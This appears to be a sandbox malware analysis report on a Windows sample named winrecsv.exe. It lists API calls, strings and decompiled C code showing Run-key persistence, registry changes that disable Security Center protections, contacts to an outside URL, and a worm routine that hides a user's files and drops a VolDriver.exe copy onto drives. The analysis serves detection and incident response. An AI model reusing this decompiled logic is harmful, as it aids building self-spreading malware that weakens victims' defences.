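Whether the Security Center service on a current Windows build still honours the override values is a separate question; their presence is a tampering indicator in its own right, and the SHA256 of any winrecsv.exe found should be compared against the report's sample hash (22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092) before concluding it is the same binary, since the copy is made with CopyFileW and should be byte-identical.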
[Instruction address column for the decompiled statements above, detached from the code by extraction: one address per statement, from 0x00405a2e to 0x00406791.]
                                                                                  0x0040679e
                                                                                  0x0040679e
                                                                                  0x004067a9
                                                                                  0x004067b9
                                                                                  0x004067cb
                                                                                  0x004067e2
                                                                                  0x004067fc
                                                                                  0x00406814
                                                                                  0x0040681f
                                                                                  0x00406834
                                                                                  0x0040683f
                                                                                  0x00406854
                                                                                  0x0040685f
                                                                                  0x00406865
                                                                                  0x0040686f
                                                                                  0x00406882
                                                                                  0x0040688c
                                                                                  0x00406896
                                                                                  0x0040689b
                                                                                  0x004068ad
                                                                                  0x004068b4
                                                                                  0x004068c9
                                                                                  0x004068cf
                                                                                  0x004068e4
                                                                                  0x004068eb
                                                                                  0x00406900
                                                                                  0x00406907
                                                                                  0x0040690c
                                                                                  0x00000000
                                                                                  0x00406913
                                                                                  0x00406329
                                                                                  0x00406344
                                                                                  0x00406362
                                                                                  0x00406368
                                                                                  0x00406381
                                                                                  0x00406460
                                                                                  0x00406465
                                                                                  0x00406483
                                                                                  0x00406489
                                                                                  0x004064a2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004064b1
                                                                                  0x004064d7
                                                                                  0x00406562
                                                                                  0x00406569
                                                                                  0x0040656e
                                                                                  0x00406577
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040657b
                                                                                  0x0040657b
                                                                                  0x004064e3
                                                                                  0x004064f2
                                                                                  0x004064f8
                                                                                  0x00406501
                                                                                  0x00406508
                                                                                  0x0040650f
                                                                                  0x00406527
                                                                                  0x0040654f
                                                                                  0x0040655c
                                                                                  0x00000000
                                                                                  0x0040655c
                                                                                  0x00406390
                                                                                  0x004063b6
                                                                                  0x00406441
                                                                                  0x00406448
                                                                                  0x0040644d
                                                                                  0x00406456
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040645a
                                                                                  0x0040645a
                                                                                  0x004063c2
                                                                                  0x004063d1
                                                                                  0x004063d7
                                                                                  0x004063e0
                                                                                  0x004063e7
                                                                                  0x004063ee
                                                                                  0x00406406
                                                                                  0x0040642e
                                                                                  0x0040643b
                                                                                  0x00000000
                                                                                  0x0040643b
                                                                                  0x0040632d
                                                                                  0x0040632d
                                                                                  0x004062b9
                                                                                  0x004062bf
                                                                                  0x004062c3
                                                                                  0x004062d0
                                                                                  0x004062d4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062d6
                                                                                  0x004062dd
                                                                                  0x004062ec
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062ec
                                                                                  0x004062fa
                                                                                  0x004062fc
                                                                                  0x004062ff
                                                                                  0x00000000
                                                                                  0x004062ff
                                                                                  0x00406203

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001B58), ref: 00405A2E
                                                                                  • FindWindowA.USER32 ref: 00405A61
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405A7F
                                                                                  • MoveFileA.KERNEL32 ref: 00405A8F
                                                                                  • MoveFileA.KERNEL32 ref: 00405A9F
                                                                                  • FindWindowA.USER32 ref: 00405AAC
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405AC6
                                                                                  • MoveFileA.KERNEL32 ref: 00405AD6
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405AE1
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B13
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,ffag8f2g8fg82g8f8g8fg), ref: 00405B23
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405B2E
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B39
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B49
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B59
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405B64
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00405B6F
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405B7F
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B8F
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B9A
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405BAA
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405BB5
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405BC0
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405BCB
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405BDE
                                                                                  • DeleteFileW.KERNEL32(ffag8f2g8fg82g8f8g8fg), ref: 00405BEF
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405C07
                                                                                  • MoveFileA.KERNEL32 ref: 00405C17
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405C22
                                                                                  • DeleteFileW.KERNEL32(ffag8f2g8fg82g8f8g8fg), ref: 00405C2D
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405C38
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405C43
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405C5D
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405C6E
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405CAE
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405CB9
                                                                                  • MoveFileA.KERNEL32 ref: 00405CC9
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405CD4
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405CE3
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405CEE
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405CF9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405D06
                                                                                  • Sleep.KERNEL32(00002710), ref: 00405D11
                                                                                  • ShowWindow.USER32(00000000,00000001), ref: 00405D20
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00405D2D
                                                                                  • MoveFileA.KERNEL32 ref: 00405D3D
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405D83
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405D8E
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405D9E
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405DA9
                                                                                  • DeleteFileA.KERNEL32(2dgd828d8g8fg8g8g), ref: 00405DB4
                                                                                  • FindWindowA.USER32 ref: 00405DC1
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405DDA
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405DFD
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405E0D
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405E27
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405E41
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405E4C
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00405E57
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,argarhrharharfafrahth), ref: 00405E67
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405E72
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405E7D
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405E8A
                                                                                  • Sleep.KERNEL32(00000DAC), ref: 00405E95
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405EA2
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405EAD
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00405EC9
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405ED4
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00405EE1
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405EEC
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405EFF
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405F2C
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405F4B
                                                                                  • Sleep.KERNEL32(00002710), ref: 00405F56
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405F61
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405F6E
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405F79
                                                                                  • Sleep.KERNEL32(00000064), ref: 00405F81
                                                                                  • MoveFileA.KERNEL32 ref: 00405F91
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405F9C
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405FAC
                                                                                  • DeleteFileA.KERNEL32(2dgd828d8g8fg8g8g), ref: 00405FB7
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC4
                                                                                  • FindWindowA.USER32 ref: 00405FF3
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040600D
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00406018
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00406028
                                                                                  • Sleep.KERNEL32(00001388), ref: 00406033
                                                                                  • Sleep.KERNEL32(00001388), ref: 0040603E
                                                                                  • PathFileExistsA.SHLWAPI(aefafugaugfgauegf), ref: 0040605A
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00406069
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406074
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040607F
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 0040608A
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406095
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060A0
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060AB
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060B6
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060C1
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,ffag8f2g8fg82g8f8g8fg), ref: 004060D1
                                                                                  • FindWindowA.USER32 ref: 004060DE
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060F8
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00406105
                                                                                  • ShowWindow.USER32(00000000,00000001), ref: 00406114
                                                                                  • Sleep.KERNEL32(00003A98), ref: 0040611F
                                                                                  • MoveFileA.KERNEL32 ref: 0040612F
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 0040613A
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406145
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406150
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 0040615B
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00406166
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 0040619D
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004061A8
                                                                                  • Sleep.KERNEL32(00002328), ref: 004061B3
                                                                                  • MoveFileW.KERNEL32(argarhrharharfafrahth,4yy4w4yw4fwgwgw), ref: 004061C3
                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,984658), ref: 004061E8
                                                                                  • GetLastError.KERNEL32 ref: 004061F4
                                                                                  • ExitProcess.KERNEL32 ref: 00406203
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00414A30,00000105), ref: 00406229
                                                                                  • PathFindFileNameW.SHLWAPI(00414A30), ref: 00406234
                                                                                  • wsprintfW.USER32 ref: 00406251
                                                                                  • DeleteFileW.KERNEL32(?), ref: 00406261
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00406278
                                                                                  • ExitProcess.KERNEL32 ref: 0040632D
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000104), ref: 00406344
                                                                                  • wsprintfW.USER32 ref: 00406362
                                                                                  • CopyFileW.KERNEL32(00414A30,?,00000000), ref: 00406379
                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 00406390
                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 004063AE
                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 0040642E
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040643B
                                                                                  • ExitProcess.KERNEL32 ref: 0040645A
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406465
                                                                                  • wsprintfW.USER32 ref: 00406483
                                                                                  • CopyFileW.KERNEL32(00414A30,?,00000000), ref: 0040649A
                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 004064B1
                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 004064CF
                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 0040654F
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040655C
                                                                                  • ExitProcess.KERNEL32 ref: 0040657B
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406586
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,00000000), ref: 004065A4
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004065CB
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004065EA
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00406609
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406628
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406647
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406666
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406685
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00406692
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center\Svc,00000000,00020006,00000000), ref: 004066B0
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004066D7
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004066F6
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00406715
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406734
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406753
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406772
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406791
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040679E
                                                                                  • Sleep.KERNEL32(000001F4), ref: 004067A9
                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 004067CB
                                                                                  • wsprintfW.USER32 ref: 004067E2
                                                                                  • wsprintfW.USER32 ref: 004067FC
                                                                                  • CreateThread.KERNEL32 ref: 00406814
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040681F
                                                                                  • CreateThread.KERNEL32 ref: 00406834
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040683F
                                                                                  • CreateThread.KERNEL32 ref: 00406854
                                                                                  • Sleep.KERNEL32(00002710), ref: 0040685F
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040687C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Delete$Sleep$Move$Value$Internet$Window$CloseOpen$FindHandle$Createwsprintf$ExitProcess$ForegroundShowThread$AttributesCopyEnvironmentExpandNamePathStrings$ErrorEventExistsLastModuleMutexStartup
                                                                                  • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tncmds.dat$%s\tnnodes.dat$%userprofile%$%windir%$(#$,$2#$2dgd828d8g8fg8g8g$4yy4w4yw4fwgwgw$579795729858927452784$7$984658$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$aefafugaugfgauegf$aefyaiegfayegfg$argarhargafafargh$argarhrharharfafrahth$feu8gf8g2gf8g2fg$ffag8f2g8fg82g8f8g8fg$http://2462462645.fr/$ttyu8ruy8uy8u8yu$winrecsv.exe
                                                                                  • API String ID: 1472887078-2105414062
                                                                                  Uniqueness
                                                                                  • Uniqueness Score: -1.00%
                                                                                  Control-flow Graph
                                                                                  • Control-flow graph of E00404BD0 (basic blocks 0x404bd0 to 0x4050a8, nodes coloured Executed / Not Executed); the raw node and edge dump is omitted here.
                                                                                  C-Code - Quality: 100%
                                                                                  			// Decompiled by Joe Sandbox. Reading of the routine: for the directory _a4 it creates a hidden
                                                                                  			// subdirectory, drops a copy of the sample there as VolDriver.exe, places a .lnk beside it,
                                                                                  			// deletes files matching script/executable patterns and moves every other entry into the hidden
                                                                                  			// subdirectory. Drive-letter shortcut icons and hidden-folder relocation of the user's files are
                                                                                  			// the usual signs of worm-style spreading to removable drives; watch for VolDriver.exe and a
                                                                                  			// hidden folder plus a single .lnk appearing at a drive root.
                                                                                  			E00404BD0(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16) {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				short _v1564;
                                                                                  				short _v2084;
                                                                                  				intOrPtr _v2088;
                                                                                  				short _v2612;
                                                                                  				short _v3132;
                                                                                  				char _v3133;
                                                                                  				struct _WIN32_FIND_DATAW _v3732;
                                                                                  				short _v4252;
                                                                                  				void* _v4256;
                                                                                  				short _v4780;
                                                                                  				intOrPtr _v4784;
                                                                                  				WCHAR* _v4788;
                                                                                  				WCHAR* _v4792;
                                                                                  				WCHAR* _v4796;
                                                                                  				WCHAR* _v4800;
                                                                                  				WCHAR* _v4804;
                                                                                  				intOrPtr _v4808;
                                                                                  				WCHAR* _v4812;
                                                                                  				WCHAR* _v4816;
                                                                                  				WCHAR* _v4820;
                                                                                  				WCHAR* _v4824;
                                                                                  				WCHAR* _v4828;
                                                                                  				WCHAR* _v4832;
                                                                                  				WCHAR* _v4836;
                                                                                  				WCHAR* _v4840;
                                                                                  				WCHAR* _v4844;
                                                                                  				WCHAR* _v4848;
                                                                                  				WCHAR* _v4852;
                                                                                  				WCHAR* _v4856;
                                                                                  				WCHAR* _v4860;
                                                                                  				signed char _v4861;
                                                                                  				signed char _v4862;
                                                                                  				signed int _v4868;
                                                                                  				signed int _v4872;
                                                                                  				intOrPtr _t167;
                                                                                  				intOrPtr _t195;
                                                                                  				void* _t218;
                                                                                  				void* _t219;
                                                                                  				void* _t224;
                                                                                  
                                                                                  				L0040F1AA();
                                                                                  				if((_a12 & 0x00080000) != 0) {
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_v2088 = 0x4140cc; // pointer to a string constant in .data: the name of the hidden subdirectory
                                                                                  				_v3133 = 0;        // return value (never set elsewhere in this routine)
                                                                                  				wsprintfW( &_v1564, L"%s.lnk", _a8);
                                                                                  				wsprintfW( &_v4252, L"%s\\%s", _a4, _v2088);
                                                                                  				wsprintfW( &_v4780, L"%s\\%s\\VolDriver.exe", _a4, _v2088);
                                                                                  				wsprintfW( &_v2612, L"%s\\%s", _a4,  &_v1564);
                                                                                  				wsprintfW( &_v1044, L"%s\\*", _a4);
                                                                                  				_t224 = _t219 + 0x48;
                                                                                  				// An older VolDriver.exe is already present: compare a value computed from it (E0040D530)
                                                                                  				// against a global at 0x414410 and, if it differs, strip attributes (0x80 = FILE_ATTRIBUTE_NORMAL)
                                                                                  				// and delete the stale copy so it is replaced below.
                                                                                  				if(PathFileExistsW( &_v4780) != 0) {
                                                                                  					_t167 = E0040D530( &_v4780);
                                                                                  					_t224 = _t224 + 4;
                                                                                  					_v4784 = _t167;
                                                                                  					_t195 =  *0x414410; // 0x0
                                                                                  					if(_t195 != _v4784) {
                                                                                  						SetFileAttributesW( &_v4780, 0x80);
                                                                                  						DeleteFileW( &_v4780);
                                                                                  					}
                                                                                  				}
                                                                                  				// Create the subdirectory and mark it hidden (2 = FILE_ATTRIBUTE_HIDDEN), then copy the file
                                                                                  				// whose path is stored in the global at 0x414418 into it as VolDriver.exe, also hidden.
                                                                                  				if(PathFileExistsW( &_v4780) == 0) {
                                                                                  					if(PathFileExistsW( &_v4252) == 0 && CreateDirectoryW( &_v4252, 0) != 0) {
                                                                                  						SetFileAttributesW( &_v4252, 2);
                                                                                  					}
                                                                                  					if(PathFileExistsW( &_v4252) != 0 && CopyFileW(0x414418,  &_v4780, 0) != 0) {
                                                                                  						SetFileAttributesW( &_v4780, 2);
                                                                                  					}
                                                                                  				}
                                                                                  				// Create the <_a8>.lnk shortcut via E00404980 using icon index 8 or 9 from shell32.dll
                                                                                  				// (drive-style icons, chosen by _a16) and set it read-only (1 = FILE_ATTRIBUTE_READONLY).
                                                                                  				if(PathFileExistsW( &_v2612) == 0) {
                                                                                  					if((_a16 & 0x000000ff) == 0) {
                                                                                  						E00404980( &_v2612, L"shell32.dll", 8);
                                                                                  						_t224 = _t224 + 0xc;
                                                                                  					} else {
                                                                                  						E00404980( &_v2612, L"shell32.dll", 9);
                                                                                  						_t224 = _t224 + 0xc;
                                                                                  					}
                                                                                  					SetFileAttributesW( &_v2612, 1);
                                                                                  				}
                                                                                  				_v4256 = FindFirstFileW( &_v1044,  &_v3732);
                                                                                  				if(_v4256 == 0xffffffff) {
                                                                                  					L45:
                                                                                  					return _v3133;
                                                                                  				} else {
                                                                                  					// 13 wildcard patterns: matching files in _a4 are deleted (see the PathMatchSpecW loop below).
                                                                                  					_v4860 = L"*.lnk";
                                                                                  					_v4856 = L"*.vbs";
                                                                                  					_v4852 = L"*.js";
                                                                                  					_v4848 = L"*.scr";
                                                                                  					_v4844 = L"*.com";
                                                                                  					_v4840 = L"*.jse";
                                                                                  					_v4836 = L"*.cmd";
                                                                                  					_v4832 = L"*.pif";
                                                                                  					_v4828 = L"*.jar";
                                                                                  					_v4824 = L"*.dll";
                                                                                  					_v4820 = L"*.vbe";
                                                                                  					_v4816 = L"*.bat";
                                                                                  					_v4812 = L"*.inf";
                                                                                  					// 6 names that are left untouched: the hidden subdirectory, the dropped .lnk and Windows housekeeping entries.
                                                                                  					_v4808 = _v2088;
                                                                                  					_v4804 =  &_v1564;
                                                                                  					_v4800 = L"Thumbs.db";
                                                                                  					_v4796 = L"$RECYCLE.BIN";
                                                                                  					_v4792 = L"desktop.ini";
                                                                                  					_v4788 = L"System Volume Information";
                                                                                  					do {
                                                                                  						if(lstrcmpW( &(_v3732.cFileName), ".") != 0 && lstrcmpW( &(_v3732.cFileName), L"..") != 0) {
                                                                                  							// Case-insensitive check against the 6 skip names (the table at _t218 - 0x12c4).
                                                                                  							_v4862 = 0;
                                                                                  							_v4868 = 0;
                                                                                  							while(_v4868 < 6) {
                                                                                  								if(lstrcmpiW( &(_v3732.cFileName),  *(_t218 + _v4868 * 4 - 0x12c4)) == 0) {
                                                                                  									_v4862 = 1;
                                                                                  									break;
                                                                                  								}
                                                                                  								_v4868 = _v4868 + 1;
                                                                                  							}
                                                                                  							if((_v4862 & 0x000000ff) == 0) {
                                                                                  								_v4861 = 0;
                                                                                  								_v4872 = 0;
                                                                                  								// Any entry matching one of the 13 patterns (table at _t218 - 0x12f8) is made normal and deleted.
                                                                                  								while(_v4872 < 0xd) {
                                                                                  									if(PathMatchSpecW( &(_v3732.cFileName),  *(_t218 + _v4872 * 4 - 0x12f8)) != 0) {
                                                                                  										wsprintfW( &_v2084, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                  										_t224 = _t224 + 0x10;
                                                                                  										SetFileAttributesW( &_v2084, 0x80);
                                                                                  										DeleteFileW( &_v2084);
                                                                                  										_v4861 = 1;
                                                                                  										break;
                                                                                  									}
                                                                                  									_v4872 = _v4872 + 1;
                                                                                  								}
                                                                                  								// Everything else is moved into the hidden subdirectory: plain files with MoveFileExW flags 9
                                                                                  								// (MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH), directories (0x10 = FILE_ATTRIBUTE_DIRECTORY)
                                                                                  								// through E00404A90.
                                                                                  								if((_v4861 & 0x000000ff) == 0) {
                                                                                  									if(PathFileExistsW( &_v4252) != 0) {
                                                                                  										wsprintfW( &_v3132, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                  										wsprintfW( &_v524, L"%s\\%s\\%s", _a4, _v2088,  &(_v3732.cFileName));
                                                                                  										_t224 = _t224 + 0x24;
                                                                                  										if((_v3732.dwFileAttributes & 0x00000010) == 0) {
                                                                                  											MoveFileExW( &_v3132,  &_v524, 9);
                                                                                  										} else {
                                                                                  											E00404A90( &_v3132,  &_v524);
                                                                                  											_t224 = _t224 + 8;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								goto L43;
                                                                                  							}
                                                                                  						}
                                                                                  						L43:
                                                                                  					} while (FindNextFileW(_v4256,  &_v3732) != 0);
                                                                                  					FindClose(_v4256);
                                                                                  					goto L45;
                                                                                  				}
                                                                                  			}
                                                                                  0x00404f3e
                                                                                  0x00404f59
                                                                                  0x00404f7f
                                                                                  0x00404f9a
                                                                                  0x00404fa0
                                                                                  0x00404faf
                                                                                  0x00404fbc
                                                                                  0x00404fc2
                                                                                  0x00000000
                                                                                  0x00404fc2
                                                                                  0x00404f53
                                                                                  0x00404f53
                                                                                  0x00404fd9
                                                                                  0x00404fef
                                                                                  0x0040500d
                                                                                  0x00405034
                                                                                  0x0040503a
                                                                                  0x00405046
                                                                                  0x00405070
                                                                                  0x00405048
                                                                                  0x00405056
                                                                                  0x0040505b
                                                                                  0x0040505b
                                                                                  0x00405046
                                                                                  0x00404fef
                                                                                  0x00000000
                                                                                  0x00404fd9
                                                                                  0x00404f32
                                                                                  0x00405076
                                                                                  0x0040508a
                                                                                  0x00405099
                                                                                  0x00000000
                                                                                  0x00405099

                                                                                  APIs
                                                                                  • _chkstk.NTDLL(?,00405220,?,?,?), ref: 00404BD8
                                                                                  • wsprintfW.USER32 ref: 00404C0F
                                                                                  • wsprintfW.USER32 ref: 00404C2F
                                                                                  • wsprintfW.USER32 ref: 00404C4F
                                                                                  • wsprintfW.USER32 ref: 00404C6F
                                                                                  • wsprintfW.USER32 ref: 00404C88
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404C98
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00404CD1
                                                                                  • DeleteFileW.KERNEL32(?), ref: 00404CDE
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404CEB
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404CFC
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00404D0F
                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404D22
